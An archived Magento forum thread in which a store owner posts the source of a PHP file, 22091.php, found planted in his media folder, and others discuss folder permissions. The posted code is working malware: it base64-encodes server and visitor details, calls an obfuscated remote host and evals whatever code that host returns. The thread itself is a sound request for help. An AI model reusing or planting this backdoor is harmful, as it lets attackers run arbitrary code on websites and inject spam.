Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

22091.php
 
Anjanesh
Sr. Member
 
Avatar
Total Posts:  136
Joined:  2008-03-15
Mumbai, India
 

A file called 22091.php got inserted in my media folder.
I checked out the 22091.php file and this what it is (after indenting it) :

<?
error_reporting
(0);
$a = (isset($_SERVER["HTTP_HOST"])            ? $_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"])          ? $_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"])          ? $_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"])             ? $_SERVER["PHP_SELF"]:$PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"])         ? $_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"])         ? $_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"])      ? $_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"])          ? $_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"])      ? $_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z "/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f base64_decode("cGhwc2VhcmNoLmNu");
if (
basename($c) == basename($i) && isset($_REQUEST["q"])&& md5($_REQUEST["q"]) == "1f34d89add3b510a6e851c8fd9f90dc7")
 
$f $_REQUEST["id"];
if ((include(
base64_decode("aHR0cDovL2FkczEu").$f.$z)));
else if(
$c file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
 
eval($c);
else
{
        $cu 
curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
        
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
        
$o curl_exec($cu);
        
curl_close($cu);
        
eval($o);
};
die();
?>

I dont know what it does but I did a google on site:mydomain.com and a lot of junk links are shown.
Anyone else come across this ?

PHP 5.2.6 | Magento 1.1.8

 
Magento Community Magento Community
Magento Community
Magento Community
 
Damian Culotta
Enthusiast
 
Total Posts:  878
Joined:  2008-12-10
Argentina
 

I’m pretty sure that this file is not a Magento file.
I never saw that file before into Magento code.

 
Magento Community Magento Community
Magento Community
Magento Community
 
Anjanesh
Sr. Member
 
Avatar
Total Posts:  136
Joined:  2008-03-15
Mumbai, India
 
Damián Culotta - 31 December 2008 12:20 PM

I’m pretty sure that this file is not a Magento file.
I never saw that file before into Magento code.

Thats obvious.
But because its in media folder, could there be a possible hole in the upload system ? Since media folder is chmoded to 777 ?

 
Magento Community Magento Community
Magento Community
Magento Community
 
Damian Culotta
Enthusiast
 
Total Posts:  878
Joined:  2008-12-10
Argentina
 

There’s a secutiry problem if you set 777 to one folder.
Maybe you can set regular permissions, but changing the owner of the folder.
For example, apply something like this:

chown -R www-data:www-data media

With that change, your folder only gonna be writable for the owner, in this case, www-data, that is the user that (it depends of each configuration) runs your webserver.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top